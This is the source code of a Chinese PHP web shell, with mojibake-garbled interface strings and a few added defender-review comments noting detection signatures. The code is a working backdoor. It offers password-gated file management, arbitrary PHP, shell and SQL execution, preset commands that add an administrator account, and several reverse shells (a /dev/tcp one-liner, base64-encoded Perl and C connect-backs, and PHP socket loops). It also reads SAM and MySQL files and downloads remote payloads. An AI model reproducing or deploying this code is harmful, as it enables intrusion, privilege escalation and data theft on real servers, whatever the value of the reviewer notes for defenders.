$v) { $_POST[$k] = stripslashes($v); } foreach ($_GET as $k => $v) { $_GET[$k] = stripslashes($v); } }
// NOTE(review, defender): this is the access gate of what the later menu keys
// (upfiles, phpcode, cmd, sqlshell, ...) show to be a PHP web shell.
// `envlpass` written without quotes is a constant defined outside this excerpt,
// presumably the operator's password (confirm against the file header).
// A request carrying a parameter whose NAME equals that constant's value is
// answered with hmlogin(2) and the script stops.
if (isset($_REQUEST[envlpass])) { hmlogin(2); exit; }
// Session state is a cookie literally named "envlpass" whose value is
// md5(<constant>), i.e. 32 hex characters. setcookie() is called with name and
// value only, so the cookie carries no expiry and no flags.
// Hunting leads grounded in this file: requests or responses with a cookie named
// "envlpass", a POST field named "envlpass", and the query parameter "eanver"
// that selects the action after login.
if ($_COOKIE['envlpass'] != md5(envlpass)) { if ($_POST['envlpass']) { if ($_POST['envlpass'] == envlpass) { setcookie('envlpass', md5($_POST['envlpass'])); css_main(); hmlogin(); die; } else { echo '
�������,��5���Ӻ�����
'; } } islogin($shellname, $myurl); exit; } /*---End Login---*/ if (isset($_GET['down'])) { do_down($_GET['down']); } if (isset($_GET['pack'])) { $dir = do_show($_GET['pack']); $zip = new eanver($dir); $out = $zip->out; do_download($out, "eanver.tar.gz"); } if (isset($_GET['unzip'])) { css_main(); start_unzip($_GET['unzip'], $_GET['unzip'], $_GET['todir']); exit; } define('root_dir', str_replace('\\', '/', dirname(myaddress)) . '/'); define('run_win', substr(PHP_OS, 0, 3) == "WIN"); define('my_shell', str_path(root_dir . $_SERVER['SCRIPT_NAME'])); $eanver = isset($_GET['eanver']) ? $_GET['eanver'] : ""; $doing = isset($_POST['doing']) ? $_POST['doing'] : ""; $path = isset($_GET['path']) ? $_GET['path'] : root_dir; $name = isset($_POST['name']) ? $_POST['name'] : ""; $img = isset($_GET['img']) ? $_GET['img'] : ""; $p = isset($_GET['p']) ? $_GET['p'] : ""; $pp = urlencode(dirname($p)); if ($img) { css_img($img); } if ($eanver == "phpinfo") { die(phpinfo()); } if ($eanver == 'logout') { setcookie('envlpass', null); die(''); } $class = array("��Ϣ����" => array("upfiles" => "�ϴ��ļ�", "phpinfo" => "������Ϣ", "info_f" => "ϵͳ��Ϣ", "phpcode" => "ִ��PHP�ű�"), "��Ȩ����" => array("sqlshell" => "ִ��SQL���", "mysql_exec" => "Mysql����", "othersql" => "�������ݿ�", "myexp" => "Mysql_udf��Ȩ", "winapi" => "Win Api��Ȩ", "mofshell" => "Mof˫����Ȩ", "cmd" => "ִ��Cmd����", "linux" => "������Ȩ", "servu" => "Serv-U��Ȩ", "readpass" => "��Ȩ�޶�root����", "downloader" => "�ļ�����", "port" => "�˿�ɨ��"), "��������" => array("guama" => "������������", "tihuan" => "�����滻����", "scanfile" => "���������ļ�", "scanphp" => "��������ľ��", "zippak" => "ZIP��ѹ"), "�ű����" => array("getcode" => "��ȡ��ҳԴ��")); $msg = array("0" => "����ɹ�", "1" => "����ʧ��", "2" => "�ϴ��ɹ�", "3" => "�ϴ�ʧ��", "4" => "�޸ijɹ�", "5" => "�޸�ʧ��", "6" => "ɾ���ɹ�", "7" => "ɾ��ʧ��"); css_main(); switch ($eanver) { case "left": css_left(); html_n("
"); html_img("title"); html_n(" ����Ӳ��
"); $i = 2; foreach ($class as $name => $array) { html_n("
"); html_img("title"); html_n(" {$name}
"); $i++; } html_n("
"); html_img("title"); html_n(" ��������
"); html_n(""); break; case "main": css_js("1"); function getFilePermissions($file) { $perms = fileperms($file); if (($perms & 0xc000) == 0xc000) { // Socket $info = 's'; } elseif (($perms & 0xa000) == 0xa000) { // Symbolic Link $info = 'l'; } elseif (($perms & 0x8000) == 0x8000) { // Regular $info = '-'; } elseif (($perms & 0x6000) == 0x6000) { // Block special $info = 'b'; } elseif (($perms & 0x4000) == 0x4000) { // Directory $info = 'd'; } elseif (($perms & 0x2000) == 0x2000) { // Character special $info = 'c'; } elseif (($perms & 0x1000) == 0x1000) { // FIFO pipe $info = 'p'; } else { // Unknown $info = 'u'; } // Owner $info .= $perms & 0x100 ? 'r' : '-'; $info .= $perms & 0x80 ? 'w' : '-'; $info .= $perms & 0x40 ? $perms & 0x800 ? 's' : 'x' : ($perms & 0x800 ? 'S' : '-'); // Group $info .= $perms & 0x20 ? 'r' : '-'; $info .= $perms & 0x10 ? 'w' : '-'; $info .= $perms & 0x8 ? $perms & 0x400 ? 's' : 'x' : ($perms & 0x400 ? 'S' : '-'); // World $info .= $perms & 0x4 ? 'r' : '-'; $info .= $perms & 0x2 ? 'w' : '-'; $info .= $perms & 0x1 ? $perms & 0x200 ? 't' : 'x' : ($perms & 0x200 ? 'T' : '-'); return $info; } $dir = @dir($path); $REAL_DIR = File_Str(realpath($path)); if (!empty($_POST['actall'])) { echo '
' . File_Act($_POST['files'], $_POST['actall'], $_POST['inver'], $REAL_DIR) . '
'; } $NUM_D = $NUM_F = 0; if (!$_SERVER['SERVER_NAME']) { $GETURL = ''; } else { $GETURL = 'http://' . $_SERVER['SERVER_NAME'] . '/'; } $ROOT_DIR = File_Mode(); html_n("
·��:"); html_n("
"); html_n("
"); html_n(" "); html_input("file", "upfilet", "", "   "); html_input("submit", "uploadt", "�ϴ�"); if (!empty($_POST['newfile'])) { if (isset($_POST['bin'])) { $bin = $_POST['bin']; } else { $bin = "wb"; } if (substr(PHP_VERSION, 0, 1) >= 5) { if ($_POST['charset'] == 'GB2312' or $_POST['charset'] == 'GBK') { } else { $_POST['txt'] = iconv("gb2312//IGNORE", $_POST['charset'], $_POST['txt']); } } echo do_write($_POST['newfile'], $bin, $_POST['txt']) ? '
' . $_POST['newfile'] . ' ' . $msg[0] : '
' . $_POST['newfile'] . ' ' . $msg[1]; @touch($_POST['newfile'], @strtotime($_POST['time'])); } html_n('
'); while ($dirs = @$dir->read()) { if ($dirs == '.' or $dirs == '..') { continue; } $dirpath = str_path("{$path}/{$dirs}"); if (is_dir($dirpath)) { $perm = getFilePermissions($dirpath) . " " . substr(base_convert(fileperms($dirpath), 10, 8), -4); $filetime = @date('Y-m-d H:i:s', @filemtime($dirpath)); $dirpath = urlencode($dirpath); html_n(''); $NUM_D++; } } @$dir->rewind(); while ($files = @$dir->read()) { if ($files == '.' or $files == '..') { continue; } $filepath = str_path("{$path}/{$files}"); if (!is_dir($filepath)) { $fsize = @filesize($filepath); $fsize = File_Size($fsize); $perm = getFilePermissions($dirpath) . " " . substr(base_convert(fileperms($filepath), 10, 8), -4); $filetime = @date('Y-m-d H:i:s', @filemtime($filepath)); $Fileurls = str_replace(File_Str($ROOT_DIR . '/'), $GETURL, $filepath); $todir = $ROOT_DIR . '/zipfile'; $filepath = urlencode($filepath); $it = substr($filepath, -3); html_n(''); $NUM_F++; } } @$dir->close(); if (!$Filetime) { $Filetime = gmdate('Y-m-d H:i:s', time() + 3600 * 8); } print <<
Ŀ¼({$NUM_D}) / �ļ�({$NUM_F})
END; break; case "editr": css_js("2"); if (!empty($_POST['uploadt'])) { echo @copy($_FILES['upfilet']['tmp_name'], str_path($p . '/' . $_FILES['upfilet']['name'])) ? html_a("?eanver=main", $_FILES['upfilet']['name'] . ' ' . $msg[2]) : msg($msg[3]); die(''); } if (!empty($_GET['redir'])) { $name = $_GET['name']; $newdir = str_path($p . '/' . $name); @mkdir($newdir, 0777) ? html_a("?eanver=main", $name . ' ' . $msg[0]) : msg($msg[1]); die(''); } if (!empty($_GET['refile'])) { $name = $_GET['name']; $jspath = urlencode($p . '/' . $name); $pp = urlencode($p); $p = str_path($p . '/' . $name); $FILE_CODE = ""; $charset = 'GB2312'; $FILE_TIME = date('Y-m-d H:i:s', time() + 3600 * 8); if (@file_exists($p)) { echo '����Ŀ¼����"ͬ��"�ļ�
'; } } else { $jspath = urlencode($p); $FILE_TIME = date('Y-m-d H:i:s', filemtime($p)); $FILE_CODE = @file_get_contents($p); if (substr(PHP_VERSION, 0, 1) >= 5) { if (empty($_GET['charset'])) { if (TestUtf8($FILE_CODE) > 1) { $charset = 'UTF-8'; $FILE_CODE = iconv("UTF-8", "gb2312//IGNORE", $FILE_CODE); } else { $charset = 'GB2312'; } } else { if ($_GET['charset'] == 'GB2312') { $charset = 'GB2312'; } else { $charset = $_GET['charset']; $FILE_CODE = iconv($_GET['charset'], "gb2312//IGNORE", $FILE_CODE); } } } $FILE_CODE = htmlspecialchars($FILE_CODE); } print <<��������:
ָ�����룺 END; html_select(array("GB2312" => "GB2312", "UTF-8" => "UTF-8", "BIG5" => "BIG5", "EUC-KR" => "EUC-KR", "EUC-JP" => "EUC-JP", "SHIFT-JIS" => "SHIFT-JIS", "WINDOWS-874" => "WINDOWS-874", "ISO-8859-1" => "ISO-8859-1"), $charset, "onchange=\"window.location='?eanver=editr&p={$jspath}&charset='+options[selectedIndex].value;\""); print <<
�ļ��޸�ʱ�� �Զ�������ʽ�����ļ�(����ʹ��)
END; break; case "rename": html_n("
"); break; case "info_f": function Info_Cfg($varname) { switch ($result = get_cfg_var($varname)) { case 0: return "No"; break; case 1: return "Yes"; break; default: return $result; break; } } function Info_Fun($funName) { return false !== function_exists($funName) ? "Yes" : "No"; } $dis_func = get_cfg_var("disable_functions"); $upsize = get_cfg_var("file_uploads") ? get_cfg_var("upload_max_filesize") : "�������ϴ�"; $adminmail = isset($_SERVER['SERVER_ADMIN']) ? "" . $_SERVER['SERVER_ADMIN'] . "" : "" . get_cfg_var("sendmail_from") . ""; if ($dis_func == "") { $dis_func = "No"; } else { $dis_func = str_replace(" ", "
", $dis_func); $dis_func = str_replace(",", "
", $dis_func); } $phpinfo = !eregi("phpinfo", $dis_func) ? "Yes" : "No"; $info = array(array("������ʱ��/����ʱ��", date("Y��m��d�� h:i:s", time()) . " / " . gmdate("Y��n��j�� H:i:s", time() + 8 * 3600)), array("����������:�˿�(ip)", "" . $_SERVER['SERVER_NAME'] . ":" . $_SERVER['SERVER_PORT'] . " ( " . gethostbyname($_SERVER['SERVER_NAME']) . " )"), array("����������ϵͳ(���ֱ�\r\n��)", PHP_OS . " (" . $_SERVER['HTTP_ACCEPT_LANGUAGE'] . ")"), array("��������������", $_SERVER['SERVER_SOFTWARE']), array("���IP", getenv('REMOTE_ADDR')), array("PHP���з�ʽ(\r\n�汾)", strtoupper(php_sapi_name()) . "(" . PHP_VERSION . ") / ��ȫģʽ:" . Info_Cfg("safemode")), array("����������Ա", $adminmail), array("���ļ�·��", __FILE__), array("����ʹ��URL���ļ�[allow_url_fopen]", Info_Cfg("allow_url_fopen")), array("������̬�������ӿ�[enable_dl]", Info_Cfg("enable_dl")), array("��ʾ������Ϣ[display_errors]", Info_Cfg("display_errors")), array("�Զ���ȫ�ֱ���[register_globals]", Info_Cfg("register_globals")), array("�Զ��ַ���ת��[magic_quotes_gpc]", Info_Cfg("magic_quotes_gpc")), array("����ڴ�ʹ����[memory_limit]", Info_Cfg("memory_limit")), array("POST����ֽ�[post_max_size]", Info_Cfg("post_max_size")), array("��������ϴ�[upload_max_filesize]", $upsize), array("���������ʱ��[max_execution_time]", Info_Cfg("max_execution_time") . "��"), array("���ú���[disable_functions]", $dis_func), array("������Ϣ����[phpinfo()]", $phpinfo), array("Ŀǰ���п���ռ�diskfreespace", intval(diskfreespace(".") / (1024 * 1024)) . 
'Mb'), array("GZѹ���ļ�֧��[zlib]", Info_Fun("gzclose")), array("ZIPѹ���ļ�֧��[ZipArchive(php_zip)]", Info_Fun("zip_open")), array("IMAP�����ʼ�ϵͳ", Info_Fun("imap_close")), array("XML����", Info_Fun("xml_set_object")), array("FTP��½", Info_Fun("ftp_login")), array("Session֧��", Info_Fun("session_start")), array("Socket֧��", Info_Fun("fsockopen")), array("MySQL���ݿ�", Info_Fun("mysql_close")), array("MSSQL���ݿ�", Info_Fun("mssql_close")), array("Postgre SQL���ݿ�", Info_Fun("pg_close")), array("SQLite���ݿ�", Info_Fun("sqlite_close")), array("Oracle���ݿ�", Info_Fun("ora_close")), array("Oracle 8���ݿ�", Info_Fun("OCILogOff")), array("SyBase���ݿ�", Info_Fun("sybase_close")), array("Hyperwave���ݿ�", Info_Fun("hw_close")), array("InforMix���ݿ�", Info_Fun("ifx_close")), array("FilePro���ݿ�", Info_Fun("filepro_fieldcount")), array("DBA/DBM����", Info_Fun("dba_close") . " / " . Info_Fun("dbmclose")), array("ODBC/dBASE����", Info_Fun("odbc_close") . " / " . Info_Fun("dbase_close")), array("PREL�����﷨[PCRE]", Info_Fun("preg_match")), array("PDF֧��", Info_Fun("pdf_close")), array("ͼ�δ���[GD Library]", Info_Fun("imageline")), array("SNMP�������Э��", Info_Fun("snmpget"))); echo '
'); html_a('?eanver=main&path=' . uppath($path), '�ϼ�Ŀ¼'); html_n('����'); html_n('�ļ������޸�ʱ���ļ���С
'); html_img("dir"); html_a('?eanver=main&path=' . $dirpath, $dirs); html_n(''); html_n("����"); html_n("ɾ�� "); html_a('?pack=' . $dirpath, '���'); html_n(''); html_a('?eanver=perm&p=' . $dirpath . '&chmod=' . $perm, $perm); html_n('' . $filetime . ''); html_n('
'); html_img(css_showimg($files)); html_a($Fileurls, $files, ' target="_blank" title="��"'); html_n(''); if ($it == '.gz' or $it == 'zip' or $it == 'tar' or $it == '.7z') { html_a('?unzip=' . $filepath, '��ѹ', 'title="��ѹ' . $files . '" onClick="rusurechk(\'' . $todir . '\',\'?unzip=' . $filepath . '&todir=\');return false;"'); } else { html_a('?eanver=editr&p=' . $filepath, '�༭', 'title="�༭' . $files . '"'); } html_n("����"); html_n("����"); html_n("ɾ�� "); html_a('?down=' . $filepath, '����', '�༭', 'title="����' . $files . '"'); html_n(''); html_a('?eanver=perm&p=' . $filepath . '&chmod=' . $perm, $perm); html_n('' . $filetime . ''); html_a('?down=' . $filepath, $fsize, 'title="����' . $files . '"'); html_n('
"); $newname = urldecode($pp) . '/' . urlencode($_GET['newname']); @rename($p, $newname) ? html_a("?eanver=main&path={$pp}", urlencode($_GET['newname']) . ' ' . $msg[4]) : msg($msg[5]); die(''); break; case "deltree": html_n("
"); do_deltree($p) ? html_a("?eanver=main&path={$pp}", $p . ' ' . $msg[6]) : msg($msg[7]); die(''); break; case "del": html_n("
"); @unlink($p) ? html_a("?eanver=main&path={$pp}", $p . ' ' . $msg[6]) : msg($msg[7]); die(''); break; case "copy": html_n("
"); $newpath = explode('/', $_GET['newcopy']); $pathr[0] = $newpath[0]; for ($i = 1; $i < count($newpath); $i++) { $pathr[] = urlencode($newpath[$i]); } $newcopy = implode('/', $pathr); @copy($p, $newcopy) ? html_a("?eanver=main&path={$pp}", $newcopy . ' ' . $msg[4]) : msg($msg[5]); die(''); break; case "perm": html_n("
" . $p . ' ����Ϊ: '); if (is_dir($p)) { html_select(array("0777" => "0777", "0755" => "0755", "0555" => "0555"), $_GET['chmod']); } else { html_select(array("0666" => "0666", "0644" => "0644", "0444" => "0444"), $_GET['chmod']); } html_input("submit", "save", "�޸�"); back(); if ($_POST['class']) { switch ($_POST['class']) { case "0777": $change = @chmod($p, 0777); break; case "0755": $change = @chmod($p, 0755); break; case "0555": $change = @chmod($p, 0555); break; case "0666": $change = @chmod($p, 0666); break; case "0644": $change = @chmod($p, 0644); break; case "0444": $change = @chmod($p, 0444); break; } $change ? html_a("?eanver=main&path={$pp}", $msg[4]) : msg($msg[5]); die(''); } html_n("
'; for ($i = 0; $i < count($info); $i++) { echo '' . "\n"; } $shell = new COM("WScript.Shell") or die("This thing requires Windows Scripting Host"); try { $registry_proxystring = $shell->RegRead("HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\Terminal Server\\Wds\\rdpwd\\Tds\\tcp\\PortNumber"); $Telnet = $shell->RegRead("HKEY_LOCAL_MACHINE\\SOFTWARE\\Microsoft\\TelnetServer\\1.0\\TelnetPort"); $PcAnywhere = $shell->RegRead("HKEY_LOCAL_MACHINE\\SOFTWARE\\Symantec\\pcAnywhere\\CurrentVersion\\System\\TCPIPDataPort"); } catch (Exception $e) { } echo '' . "\n"; echo '' . "\n"; echo '' . "\n"; echo '
' . $info[$i][0] . '' . $info[$i][1] . '
Terminal Service�˿�Ϊ' . $registry_proxystring . '
Telnet�˿�Ϊ' . $Telnet . '
PcAnywhere�˿�Ϊ' . $PcAnywhere . '
'; break; case "cmd": $res = '���Դ���'; $cmd = 'dir'; if (!empty($_POST['cmd'])) { $res = Exec_Run(base64_decode($_POST['cmd'])); $cmd = htmlspecialchars(base64_decode($_POST['cmd'])); } print << function sFull(i){ \tStr = new Array(11); \tStr[0] = "dir"; \tStr[1] = "net user KillWaf 1P@ssWord /add"; \tStr[2] = "net localgroup administrators KillWaf /add"; \tStr[3] = "netstat -ano"; \tStr[4] = "ipconfig"; \tStr[5] = "copy c:\\1.php d:\\2.php"; \tStr[6] = "tftp -i {$_SERVER["REMOTE_ADDR"]} get server.exe c:\\server.exe"; \tStr[7] = "0<&123;exec 123<>/dev/tcp/{$_SERVER["REMOTE_ADDR"]}/12666; sh <&123 >&123 2>&123"; \tStr[8] = "tasklist -svc"; \tdocument.getElementById('cmd').value = Str[i]; \treturn true; } END; html_base(); print <<
ִ�����������ܶ����غ��������ִ�в��ˣ����˷�������������û���κι�����ִ��������ʹ��BASE64�����ύ����ֹ������Сϸ�ڣ���ɾͣ�
������� \t
END; break; case "linux": $yourip = isset($_POST['yourip']) ? $_POST['yourip'] : getenv('REMOTE_ADDR'); $yourport = isset($_POST['yourport']) ? $_POST['yourport'] : '12666'; $system = strtoupper(substr(PHP_OS, 0, 3)); print <<ʹ�÷�����
\t\t\t�����Լ���������"nc -vv -l 12666"
\t\t\tȻ���ڴ���д����Ե�IP,�����ӣ��˷�����ȫ��ʵ�ã�����NC������
��ĵ�ַ
���Ӷ˿�
ִ�з�ʽ
END; if (!empty($_POST['yourip']) && !empty($_POST['yourport'])) { echo '
'; if ($_POST['use'] == 'perl') { $back_connect_pl = "IyEvdXNyL2Jpbi9wZXJsDQp1c2UgU29ja2V0Ow0KJGNtZD0gImx5bngiOw0KJHN5c3RlbT0gJ2VjaG8gImB1bmFtZSAtYWAiO2Vj" . "aG8gImBpZGAiOy9iaW4vc2gnOw0KJDA9JGNtZDsNCiR0YXJnZXQ9JEFSR1ZbMF07DQokcG9ydD0kQVJHVlsxXTsNCiRpYWRkcj1pbmV0X2F0b24oJHR" . "hcmdldCkgfHwgZGllKCJFcnJvcjogJCFcbiIpOw0KJHBhZGRyPXNvY2thZGRyX2luKCRwb3J0LCAkaWFkZHIpIHx8IGRpZSgiRXJyb3I6ICQhXG4iKT" . "sNCiRwcm90bz1nZXRwcm90b2J5bmFtZSgndGNwJyk7DQpzb2NrZXQoU09DS0VULCBQRl9JTkVULCBTT0NLX1NUUkVBTSwgJHByb3RvKSB8fCBkaWUoI" . "kVycm9yOiAkIVxuIik7DQpjb25uZWN0KFNPQ0tFVCwgJHBhZGRyKSB8fCBkaWUoIkVycm9yOiAkIVxuIik7DQpvcGVuKFNURElOLCAiPiZTT0NLRVQi" . "KTsNCm9wZW4oU1RET1VULCAiPiZTT0NLRVQiKTsNCm9wZW4oU1RERVJSLCAiPiZTT0NLRVQiKTsNCnN5c3RlbSgkc3lzdGVtKTsNCmNsb3NlKFNUREl" . "OKTsNCmNsb3NlKFNURE9VVCk7DQpjbG9zZShTVERFUlIpOw=="; echo File_Write('/tmp/envl_bc', base64_decode($back_connect_pl), 'wb') ? '����/tmp/envl_bc�ɹ�
' : '����/tmp/envl_bcʧ��
'; $perlpath = Exec_Run('which perl'); $perlpath = $perlpath ? chop($perlpath) : 'perl'; @unlink('/tmp/envl_bc.c'); echo Exec_Run($perlpath . ' /tmp/envl_bc ' . $_POST['yourip'] . ' ' . $_POST['yourport'] . ' &') ? 'nc -vv -l ' . $_POST['yourport'] : 'ִ������ʧ��'; } if ($_POST['use'] == 'c') { $back_connect_c = "I2luY2x1ZGUgPHN0ZGlvLmg+DQojaW5jbHVkZSA8c3lzL3NvY2tldC5oPg0KI2luY2x1ZGUgPG5ldGluZXQvaW4uaD4NCmludC" . "BtYWluKGludCBhcmdjLCBjaGFyICphcmd2W10pDQp7DQogaW50IGZkOw0KIHN0cnVjdCBzb2NrYWRkcl9pbiBzaW47DQogY2hhciBybXNbMjFdPSJyb" . "SAtZiAiOyANCiBkYWVtb24oMSwwKTsNCiBzaW4uc2luX2ZhbWlseSA9IEFGX0lORVQ7DQogc2luLnNpbl9wb3J0ID0gaHRvbnMoYXRvaShhcmd2WzJd" . "KSk7DQogc2luLnNpbl9hZGRyLnNfYWRkciA9IGluZXRfYWRkcihhcmd2WzFdKTsgDQogYnplcm8oYXJndlsxXSxzdHJsZW4oYXJndlsxXSkrMStzdHJ" . "sZW4oYXJndlsyXSkpOyANCiBmZCA9IHNvY2tldChBRl9JTkVULCBTT0NLX1NUUkVBTSwgSVBQUk9UT19UQ1ApIDsgDQogaWYgKChjb25uZWN0KGZkLC" . "Aoc3RydWN0IHNvY2thZGRyICopICZzaW4sIHNpemVvZihzdHJ1Y3Qgc29ja2FkZHIpKSk8MCkgew0KICAgcGVycm9yKCJbLV0gY29ubmVjdCgpIik7D" . "QogICBleGl0KDApOw0KIH0NCiBzdHJjYXQocm1zLCBhcmd2WzBdKTsNCiBzeXN0ZW0ocm1zKTsgIA0KIGR1cDIoZmQsIDApOw0KIGR1cDIoZmQsIDEp" . "Ow0KIGR1cDIoZmQsIDIpOw0KIGV4ZWNsKCIvYmluL3NoIiwic2ggLWkiLCBOVUxMKTsNCiBjbG9zZShmZCk7IA0KfQ=="; echo File_Write('/tmp/envl_bc.c', base64_decode($back_connect_c), 'wb') ? '����/tmp/envl_bc.c�ɹ�
' : '����/tmp/envl_bc.cʧ��
'; $res = Exec_Run('gcc -o /tmp/envl_bc /tmp/envl_bc.c'); @unlink('/tmp/envl_bc.c'); echo Exec_Run('/tmp/envl_bc ' . $_POST['yourip'] . ' ' . $_POST['yourport'] . ' &') ? 'nc -vv -l ' . $_POST['yourport'] : 'ִ������ʧ��'; } if ($_POST['use'] == 'php') { if (!extension_loaded('sockets')) { if ($system == 'WIN') { @dl('php_sockets.dll') or die("Can't load socket"); } else { @dl('sockets.so') or die("Can't load socket"); } } if ($system == "WIN") { $env = array('path' => 'c:\\windows\\system32'); } else { $env = array('PATH' => '/bin:/usr/bin:/usr/local/bin:/usr/local/sbin:/usr/sbin'); } $descriptorspec = array(0 => array("pipe", "r"), 1 => array("pipe", "w"), 2 => array("pipe", "w")); $host = $_POST['yourip']; $port = $_POST['yourport']; $host = gethostbyname($host); $proto = getprotobyname("tcp"); if (($sock = socket_create(AF_INET, SOCK_STREAM, $proto)) < 0) { die("Socket����ʧ��"); } if (($ret = socket_connect($sock, $host, $port)) < 0) { die("����ʧ��"); } else { $message = "----------------------PHP��������--------------------\n"; socket_write($sock, $message, strlen($message)); $cwd = str_replace('\\', '/', dirname(__FILE__)); while ($cmd = socket_read($sock, 65535, $proto)) { if (trim(strtolower($cmd)) == "exit") { socket_write($sock, "Bye\n"); exit; } else { $process = proc_open($cmd, $descriptorspec, $pipes, $cwd, $env); if (is_resource($process)) { fwrite($pipes[0], $cmd); fclose($pipes[0]); $msg = stream_get_contents($pipes[1]); socket_write($sock, $msg, strlen($msg)); fclose($pipes[1]); $msg = stream_get_contents($pipes[2]); socket_write($sock, $msg, strlen($msg)); $return_value = proc_close($process); } } } } } if ($_POST['use'] == 'nc') { echo '
';
// NOTE(review, defender): connect-back branch (reached when POST 'use' is 'nc').
// The script itself opens a TCP connection to the host and port supplied in the
// POST fields 'yourip' and 'yourport', so the session is initiated by the web
// server and is not stopped by rules that only filter inbound traffic.
$mip = $_POST['yourip']; $bport = $_POST['yourport']; $fp = fsockopen($mip, $bport, $errno, $errstr); if (!$fp) { $result = "Error: could not open socket connection"; } else { fputs($fp, "\n*********************************************\n \r\n\t\t hacking url:http://www.phpinfo.cc is ok! \r\n\t\t\t \n*********************************************\n\n");
// The banner above and the prompt below are fixed strings written to the socket;
// both can serve as network signatures for this family.
// Each line read from the socket is executed through the backtick operator,
// which PHP treats like shell_exec(); listing shell_exec in disable_functions
// disables the operator too. Egress filtering for the web tier and alerting on
// the web-server account spawning a shell are the matching network and host controls.
while (!feof($fp)) { fputs($fp, " [r00t@H4c3ing:/root]# "); $result = fgets($fp, 4096); $message = `{$result}`; fputs($fp, "--> " . $message . "\n"); } fclose($fp); } echo '
'; } echo '
����Գ������Ӷ˿� (nc -vv -l ' . $_POST['yourport'] . ') '; } break; case "sqlshell": $MSG_BOX = ''; $mhost = 'localhost'; $muser = 'root'; $mport = '3306'; $mpass = ''; $mdata = 'mysql'; $msql = 'select version();'; if (isset($_POST['mhost']) && isset($_POST['muser'])) { $mhost = $_POST['mhost']; $muser = $_POST['muser']; $mpass = $_POST['mpass']; $mdata = $_POST['mdata']; $mport = $_POST['mport']; if ($conn = mysql_connect($mhost . ':' . $mport, $muser, $mpass)) { @mysql_select_db($mdata); } else { $MSG_BOX = '����MYSQLʧ��'; } } $downfile = 'c:/windows/repair/sam'; if (!empty($_POST['downfile'])) { $downfile = File_Str($_POST['downfile']); $binpath = bin2hex($downfile); $query = 'select load_file(0x' . $binpath . ')'; if ($result = @mysql_query($query, $conn)) { $k = 0; $downcode = ''; while ($row = @mysql_fetch_array($result)) { $downcode .= $row[$k]; $k++; } $filedown = basename($downfile); if (!$filedown) { $filedown = 'envl.tmp'; } $array = explode('.', $filedown); $arrayend = array_pop($array); header('Content-type: application/x-' . $arrayend); header('Content-Disposition: attachment; filename=' . $filedown); header('Content-Length: ' . strlen($downcode)); echo $downcode; exit; } else { $MSG_BOX = '�����ļ�ʧ��'; } } $o = isset($_GET['o']) ? $_GET['o'] : ''; print <<
��ַ �˿� �û� ���� ����
END; if ($o == 'u') { $uppath = 'C:/Documents and Settings/All Users/����ʼ���˵�/����/����/exp.vbs'; if (!empty($_POST['uppath'])) { $uppath = $_POST['uppath']; $query = 'Create TABLE a (cmd text NOT NULL);'; if (@mysql_query($query, $conn)) { if ($tmpcode = File_Read($_FILES['upfile']['tmp_name'])) { $filecode = bin2hex(File_Read($tmpcode)); } else { $tmp = File_Str(dirname(myaddress)) . '/upfile.tmp'; if (File_Up($_FILES['upfile']['tmp_name'], $tmp)) { $filecode = bin2hex(File_Read($tmp)); @unlink($tmp); } } $query = 'Insert INTO a (cmd) VALUES(CONVERT(0x' . $filecode . ',CHAR));'; if (@mysql_query($query, $conn)) { $query = 'SELECT cmd FROM a INTO DUMPFILE \'' . $uppath . '\';'; $MSG_BOX = @mysql_query($query, $conn) ? '�ϴ��ļ��ɹ�' : '�ϴ��ļ�ʧ��'; } else { $MSG_BOX = '������ʱ��ʧ��'; } @mysql_query('Drop TABLE IF EXISTS a;', $conn); } else { $MSG_BOX = '������ʱ��ʧ��'; } } print <<
�ϴ�·��

ѡ���ļ�
END; } elseif ($o == 'tk') { if ($_POST['dump'] == 'dump') { $mysql_link = @mysql_connect($mhost, $muser, $mpass); mysql_select_db($mdata); mysql_query("SET NAMES gbk"); $mysql = ""; $q1 = mysql_query("show tables"); while ($t = mysql_fetch_array($q1)) { $table = $t[0]; $q2 = mysql_query("show create table `{$table}`"); $sql = mysql_fetch_array($q2); $mysql .= $sql['Create Table'] . ";\r\n\r\n"; $q3 = mysql_query("select * from `{$table}`"); while ($data = mysql_fetch_assoc($q3)) { $keys = array_keys($data); $keys = array_map('addslashes', $keys); $keys = join('`,`', $keys); $keys = "`" . $keys . "`"; $vals = array_values($data); $vals = array_map('addslashes', $vals); $vals = join("','", $vals); $vals = "'" . $vals . "'"; $mysql .= "insert into `{$table}`({$keys}) values({$vals});\r\n"; } $mysql .= "\r\n"; } $filename = date("Y-m-d-GisA") . ".sql"; $fp = fopen($filename, 'w'); fputs($fp, $mysql); fclose($fp); $tip = "
���ݱ��ݳɹ�������������ݿ��ļ���[" . $filename . "]
"; } else { $tip = "��δ���ݣ���֤����������Ŀ¼��д"; } print <<

�����ñ����ܣ����ݿ������ɷ�����崻������ :-(

{$tip}

END; } elseif ($o == 'd') { print <<

�����ļ�
END; } else { if (!empty($_POST['msql'])) { $msql = $_POST['msql']; if ($result = @mysql_query($msql, $conn)) { $MSG_BOX = 'ִ��SQL���ɹ�
'; $k = 0; while ($row = @mysql_fetch_array($result)) { $MSG_BOX .= $row[$k]; $k++; } } else { $MSG_BOX .= mysql_error(); } } print << function nFull(i){ \tStr = new Array(11); \tStr[0] = "select version();"; \tStr[1] = "select load_file(0x633A5C5C77696E646F77735C73797374656D33325C5C696E65747372765C5C6D657461626173652E786D6C) FROM user into outfile 'D:/web/iis.txt'"; \tStr[2] = "select '' into outfile 'F:/web/bak.php';"; \tStr[3] = "GRANT ALL PRIVILEGES ON *.* TO 'root'@'%' IDENTIFIED BY '123456' WITH GRANT OPTION;"; \tStr[4] = "select @@plugin_dir"; \tStr[5] = "select 'xxx' into dumpfile 'C:\\\\\\\\MySQL\\\\\\\\lib::\$INDEX_ALLOCATION';"; \tStr[6] = "select 'xxx' into dumpfile 'C:\\\\\\\\MySQL\\\\\\\\lib\\\\\\\\plugin::\$INDEX_ALLOCATION';"; \tnform.msql.value = Str[i]; \treturn true; }
END; } if ($MSG_BOX != '') { echo '
' . $MSG_BOX . '
'; } else { echo '
'; } break; case "downloader": $Com_durl = isset($_POST['durl']) ? $_POST['durl'] : 'http://www.baidu.com/down/muma.exe'; $Com_dpath = isset($_POST['dpath']) ? $_POST['dpath'] : File_Str(dirname(myaddress) . '/muma.exe'); print <<
������
���ص�
END; if (!empty($_POST['durl']) && !empty($_POST['dpath'])) { echo '
'; $contents = @file_get_contents($_POST['durl']); if (!$contents) { echo '�޷���ȡҪ���ص�����'; } else { echo File_Write($_POST['dpath'], $contents, 'wb') ? '�����ļ��ɹ�' : '�����ļ�ʧ��'; } echo '
